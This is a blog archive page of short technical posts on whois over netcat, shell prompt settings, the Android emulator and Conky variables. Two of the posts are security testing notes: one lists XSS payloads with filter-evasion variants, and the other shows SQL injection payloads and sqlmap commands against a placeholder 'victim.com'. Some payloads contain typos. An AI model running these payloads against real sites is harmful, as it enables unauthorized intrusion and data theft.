Posts

Showing posts from September, 2016

Whois Domain by NetCat

whois Protocol by Netcat tool : # >nc -v 199.7.56.74 43
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Connected to 199.7.56.74:43.
domain google.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
   Domain Name: GOOGLE.COM
   Registrar: MARKMONITOR INC.
   Sponsoring Registrar IANA ID: 292
   Whois Server: whois.markmonitor.com
   Referral URL: http://www.markmonitor.com
   Name Server: NS1.GOOGLE.COM
   Name Server: NS2.GOOGLE.COM
   Name Server: NS3.GOOGLE.COM
   Name Server: NS4.GOOGLE.COM
   Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
   Status: serverTransferProhibited…

My .bashrc file "Saved"

export PS1="\[\033[38;5;14m\][\[$(tput sgr0)\]\[\033[38;5;10m\]\u\[$(tput sgr0)\]\[\033[38;5;11m\]@\[$(tput sgr0)\]\[\033[38;5;160m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;14m\]\W\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;3m\]\l\[$(tput sgr0)\]\[\033[38;5;14m\]]\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;11m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"
or

PROMPT_COMMAND='echo -ne "\033]0;Terminal\007"'
PS1="\[\e[4;36m\]\h\[\e[1;31m\]$\[\e[0m\] "

Run Android Emulator Command Line

Run AVD GUI :
sdk/tools/# ./android avd List All Images :
sdk/tools# ./emulator -list-avds
3_7_WVGA_Nexus_One_API_19
Galaxy_Nexus_API_18
Nexus_4_API_17 Run an Image :
sdk/tools/# ./emulator @Galaxy_Nexus_API_18

XSS Test

Let’s start…
Example 1:
<script> alert(‘1st example’)</script>Example 2:
<ScripT>alert(‘ex2’)</ScripT>Example 3:
<sc<script>ript>alert(‘ex3’)</sc</script>ript>Example 4:
<h1><font color=blue>ex4</h1><img src=” ” onerror=alert(‘ex4’)/>Example 5:
“;promtp(‘ex6’);”Example 6:
‘;alert(‘ex7′);’Example 7:
“><script>alert(‘ex8’)</script>Example 8:
# <script>alert(‘ex9’)</alert>
That’s it for now. Stay tuned for more posts in the future…

SQL Injections in URL Rewrite

First of all, what is URL rewrite?
You’ve likely seen sites with this schema in URLs: http://victim.com/?id=1
Most everyone knows how to test for SQL injection in this situation —>
http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5 and etc.
But, in URL rewrites, this URL
http://victim.com/?id=1 will become 
http://victim.com/1 {id is hidden and the parameter 1 is used in url}

For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6 http://victim.com/1 and 3.6=3.77
and etc.
The results would be the same as a normal post parameter.
For  testing SQL injection with SQLMAP, we just use a star in the format. For instance:
sqlmap -u “http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or
sqlmap -u “http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
For injecting in the content parameter, t…

Conky Variables " Commands "

VariableArguments () = optionalExplanationacpiacadapter(adapter)ACPI ac adapter state. On linux, the adapter option specifies the subfolder of /sys/class/power_supply containing the state information (tries "AC" and "ADP1" if there is no argument given). Non-linux systems ignore it.
acpifanACPI fan state
acpitempACPI temperature in C.
addr(interface)IP address for an interface, or "No Address" if no address is assigned.
addrs(interface)IP addresses for an interface (if one - works like addr). Linux only.
adt746xcpuCPU temperature from therm_adt746x
adt746xfanFan speed from therm_adt746x
alignc(num)Align text to centre
alignr(num)Right-justify text, with space of N
apcupsdhostSets up the connection to apcupsd daemon. Prints nothing, defaults to localhost:3551
apcupsd_cablePrints the UPS connection type.
apcupsd_chargeCur…